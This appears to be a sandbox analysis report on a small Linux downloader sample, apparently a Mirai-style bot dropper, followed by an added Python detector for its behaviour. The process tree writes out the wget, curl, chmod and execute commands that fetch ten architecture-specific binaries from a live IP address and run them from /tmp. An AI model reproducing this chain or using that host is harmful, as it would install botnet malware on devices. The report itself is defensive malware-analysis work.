Analysis
- max time kernel: 8s
- max time network: 9s
- platform: debian-9_armhf
- resource: debian9-armhf-20240226-en
- resource tags: arch:armhf, image:debian9-armhf-20240226-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
- submitted: 28-03-2024 10:06
- Static task: static1
- Behavioral task behavioral1: sample 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118, resource ubuntu1804-amd64-20240226-en
- Behavioral task behavioral2: sample 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118, resource debian9-armhf-20240226-en (the run shown on this page)
- Behavioral task behavioral3: sample 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118, resource debian9-mipsbe-20240226-en
- Behavioral task behavioral4: sample 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118, resource debian9-mipsel-20240226-en
General
- Target: 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118
- Size: 1KB
- MD5: 02ca1bec2de42845c35867af0dc72be3
- SHA1: d2fc439476dd4ec34fce01257762a34b0aa6f3d5
- SHA256: 848e8eadd6296084ce9231181c15d333d453ff0a95f4163477265211839d4f54
- SHA512: 302e57020da9a74ee02c1f39c81aacb5a4385cedb7a0323ee3ba208d8e58fe5abdf83e2975bc8416ba684e164a512420b550f15569f3243f39a00d4cd99a3dc7
- Behaviour: the 1 KB sample acts as a downloader script. It spawns wget, curl, cat, chmod and ./robben once for each of ten architecture-specific binaries served from http://188.127.235.211/bins/ (see Processes), without first checking which architecture the host actually has.
Malware Config
Signatures
- Executes dropped EXE (10 IoCs)
  Processes: /tmp/robben, executed ten times (PIDs 665, 679, 685, 696, 709, 724, 738, 759, 767, 773), once per downloaded binary.
- Checks CPU configuration (1 TTP, 10 IoCs)
  Sandbox description: checks CPU information which can indicate that the system is a virtual machine.
  Processes: curl, 10 x "File opened for reading /proc/cpuinfo".
  Caveat: every hit is attributed to curl, not to the sample or to the dropped robben binary, and is consistent with the hardware-capability probing that crypto libraries (nettle, libgcrypt, OpenSSL) perform on ARM at start-up rather than with anti-analysis logic in the sample. Treat this signature as noise for this report; a clean curl invocation under strace -e trace=openat on the same image will show the same reads.
- Reads runtime system information (20 IoCs)
  Reads data from the /proc virtual filesystem.
  Processes: curl, 10 x "File opened for reading /proc/sys/crypto/fips_enabled" and 10 x "File opened for reading /proc/self/auxv".
  Same caveat: /proc/sys/crypto/fips_enabled is the kernel's FIPS-mode flag that GnuTLS and libgcrypt consult at initialisation, and /proc/self/auxv carries the hardware-capability vector; both reads are expected of curl on this platform and say nothing about the sample.
- Writes file to tmp directory (1 IoC)
  Malware often drops required files in the /tmp directory.
  File opened for modification: /tmp/robben
Processes
- /tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118   /tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118   (depth 1)
  Children (depth 2), in order. The same five-step sequence is repeated for each of the ten binaries:
  - /usr/bin/wget   wget http://188.127.235.211/bins/sora.x86
  - /usr/bin/curl   curl -O http://188.127.235.211/bins/sora.x86   [Checks CPU configuration; Reads runtime system information]
  - /bin/cat        cat sora.x86
  - /bin/chmod      chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
  - /tmp/robben     ./robben Payload   [Executes dropped EXE]
  - /usr/bin/wget   wget http://188.127.235.211/bins/sora.mips
  - /usr/bin/curl   curl -O http://188.127.235.211/bins/sora.mips   [Checks CPU configuration; Reads runtime system information]
  - /bin/cat        cat sora.mips
  - /bin/chmod      chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
  - /tmp/robben     ./robben Payload   [Executes dropped EXE]
  - /usr/bin/wget   wget http://188.127.235.211/bins/sora.mpsl
  - /usr/bin/curl   curl -O http://188.127.235.211/bins/sora.mpsl   [Checks CPU configuration; Reads runtime system information]
  - /bin/cat        cat sora.mpsl
  - /bin/chmod      chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
  - /tmp/robben     ./robben Payload   [Executes dropped EXE]
  - /usr/bin/wget   wget http://188.127.235.211/bins/sora.arm4
  - /usr/bin/curl   curl -O http://188.127.235.211/bins/sora.arm4   [Checks CPU configuration; Reads runtime system information]
  - /bin/cat        cat sora.arm4
  - /bin/chmod      chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
  - /tmp/robben     ./robben Payload   [Executes dropped EXE]
  - /usr/bin/wget   wget http://188.127.235.211/bins/sora.arm5
  - /usr/bin/curl   curl -O http://188.127.235.211/bins/sora.arm5   [Checks CPU configuration; Reads runtime system information]
  - /bin/cat        cat sora.arm5
  - /bin/chmod      chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
  - /tmp/robben     ./robben Payload   [Executes dropped EXE]
  - /usr/bin/wget   wget http://188.127.235.211/bins/sora.arm6
  - /usr/bin/curl   curl -O http://188.127.235.211/bins/sora.arm6   [Checks CPU configuration; Reads runtime system information]
  - /bin/cat        cat sora.arm6
  - /bin/chmod      chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
  - /tmp/robben     ./robben Payload   [Executes dropped EXE]
  - /usr/bin/wget   wget http://188.127.235.211/bins/sora.arm7
  - /usr/bin/curl   curl -O http://188.127.235.211/bins/sora.arm7   [Checks CPU configuration; Reads runtime system information]
  - /bin/cat        cat sora.arm7
  - /bin/chmod      chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
  - /tmp/robben     ./robben Payload   [Executes dropped EXE]
  - /usr/bin/wget   wget http://188.127.235.211/bins/sora.ppc
  - /usr/bin/curl   curl -O http://188.127.235.211/bins/sora.ppc   [Checks CPU configuration; Reads runtime system information]
  - /bin/cat        cat sora.ppc
  - /bin/chmod      chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
  - /tmp/robben     ./robben Payload   [Executes dropped EXE]
  - /usr/bin/wget   wget http://188.127.235.211/bins/sora.m68k
  - /usr/bin/curl   curl -O http://188.127.235.211/bins/sora.m68k   [Checks CPU configuration; Reads runtime system information]
  - /bin/cat        cat sora.m68k
  - /bin/chmod      chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
  - /tmp/robben     ./robben Payload   [Executes dropped EXE]
  - /usr/bin/wget   wget http://188.127.235.211/bins/sora.sh4
  - /usr/bin/curl   curl -O http://188.127.235.211/bins/sora.sh4   [Checks CPU configuration; Reads runtime system information]
  - /bin/cat        cat sora.sh4
  - /bin/chmod      chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe
  - /tmp/robben     ./robben Payload   [Executes dropped EXE]

Reading the tree: the sandbox records argv only, so shell redirections are not visible; the "Writes file to tmp directory" hit on /tmp/robben sitting between cat and chmod is consistent with cat's output being redirected into robben. The chmod argument list (the sample, robben and a systemd-private-* directory) is the complete contents of /tmp on the image, consistent with a shell glob such as chmod +x * rather than an explicit file name. Each binary is fetched twice, by wget and then by curl -O, so a host with either tool is served. The useful IoCs are the distribution host 188.127.235.211, the /bins/sora.<arch> URL pattern and the dropped file name robben; the sora.<arch> naming and the per-architecture spray are characteristic of Mirai-derived bot droppers.
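The process tree above is the whole story of this sample: fetch, mark executable, run from /tmp, ten times over. The following is an added example (not part of the sandbox report, and not the sample's own code) that turns that chain into detection logic over process-execution records of the kind a sandbox tree or an execve audit log yields. The sample events are constructed from the tree on this page; the benign control set, the example.org host and the /usr/local/bin/tool path are assumptions for illustration.

```python
"""Flag the fetch -> chmod +x -> run-from-/tmp chain seen in the report above.

Added example (not part of the sandbox report or the sample). Input is a list of
process-execution records of the kind a sandbox process tree or an execve audit log
provides: parent executable, executable, command line.
"""
import re
from dataclasses import dataclass, field
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"]+")
FETCHERS = {"wget", "curl", "ftpget", "tftp"}        # downloaders these scripts chain
SCRATCH_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/")   # world-writable drop locations


@dataclass
class ProcessEvent:
    parent: str    # executable path of the parent process
    exe: str       # executable path of this process
    cmdline: str   # full command line


@dataclass
class Finding:
    urls: list = field(default_factory=list)          # unique download URLs, in order seen
    hosts: set = field(default_factory=set)           # distribution hosts
    arch_suffixes: list = field(default_factory=list)
    chmod_targets: set = field(default_factory=set)            # basenames given execute permission
    executed_from_scratch: list = field(default_factory=list)  # basenames run out of a scratch dir

    @property
    def is_download_and_execute(self) -> bool:
        """True only when a fetched-and-chmod'ed name is also what got executed."""
        return bool(self.urls) and any(
            name in self.chmod_targets for name in self.executed_from_scratch)


def _basename(path: str) -> str:
    return path.rsplit("/", 1)[-1]


def analyse(events) -> Finding:
    f = Finding()
    for ev in events:
        argv = ev.cmdline.split()
        if not argv:
            continue
        tool = _basename(argv[0])
        if tool in FETCHERS:
            for url in URL_RE.findall(ev.cmdline):
                if url in f.urls:          # wget and curl fetch the same URL; count it once
                    continue
                f.urls.append(url)
                f.hosts.add(urlparse(url).hostname)
                # "sora.arm7" -> "arm7": per-architecture naming of Mirai-style drops
                _, dot, suffix = _basename(urlparse(url).path).rpartition(".")
                if dot:
                    f.arch_suffixes.append(suffix)
        elif tool == "chmod" and len(argv) >= 3:
            mode, targets = argv[1], argv[2:]
            # "+x", "a+x", "777", "755" ... all add execute permission
            if "x" in mode or (mode.isdigit() and any(int(d) & 1 for d in mode[-3:])):
                f.chmod_targets.update(_basename(t) for t in targets)
        elif ev.exe.startswith(SCRATCH_DIRS) and ev.parent.startswith(SCRATCH_DIRS):
            # image lives in a scratch dir and was launched by another scratch-dir process
            f.executed_from_scratch.append(_basename(ev.exe))
    return f


# Constructed from the process tree in the report: one five-process group per architecture.
SAMPLE = "/tmp/02ca1bec2de42845c35867af0dc72be3_JaffaCakes118"
BIN_BASE = "http://188.127.235.211/bins/"
ARCHS = ["x86", "mips", "mpsl", "arm4", "arm5", "arm6", "arm7", "ppc", "m68k", "sh4"]
SAMPLE_EVENTS = []
for arch in ARCHS:
    SAMPLE_EVENTS += [
        ProcessEvent(SAMPLE, "/usr/bin/wget", f"wget {BIN_BASE}sora.{arch}"),
        ProcessEvent(SAMPLE, "/usr/bin/curl", f"curl -O {BIN_BASE}sora.{arch}"),
        ProcessEvent(SAMPLE, "/bin/cat", f"cat sora.{arch}"),
        ProcessEvent(SAMPLE, "/bin/chmod",
                     "chmod +x 02ca1bec2de42845c35867af0dc72be3_JaffaCakes118 robben "
                     "systemd-private-99e08f791dec4ba2b75245122a43ebbe-systemd-timedated.service-bPorpe"),
        ProcessEvent(SAMPLE, "/tmp/robben", "./robben Payload"),
    ]

# Constructed benign control (hypothetical host and path): an admin shell fetching a
# tarball and running a tool installed outside any scratch directory.
BENIGN_EVENTS = [
    ProcessEvent("/bin/bash", "/usr/bin/curl", "curl -O https://example.org/tool.tar.gz"),
    ProcessEvent("/bin/bash", "/bin/chmod", "chmod 755 /usr/local/bin/tool"),
    ProcessEvent("/bin/bash", "/usr/local/bin/tool", "tool --version"),
]

if __name__ == "__main__":
    for label, events in (("sample", SAMPLE_EVENTS), ("benign", BENIGN_EVENTS)):
        r = analyse(events)
        print(f"{label}: download-and-execute={r.is_download_and_execute} "
              f"hosts={sorted(r.hosts)} archs={r.arch_suffixes}")
```

The rule deliberately requires all three stages to agree on one file name and requires the executed image and its parent to both live in a scratch directory; a download followed by chmod alone, or an admin running a freshly installed tool from /usr/local/bin, does not trip it. The per-URL de-duplication matters here because the script fetches every binary twice (wget, then curl -O), which would otherwise double every count.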
Network
MITRE ATT&CK Matrix (ATT&CK v13)
Downloads
- memory/688-1-0xb675d000-0xb676e044-memory.dmp (memory dump of PID 688, range 0xb675d000-0xb676e044)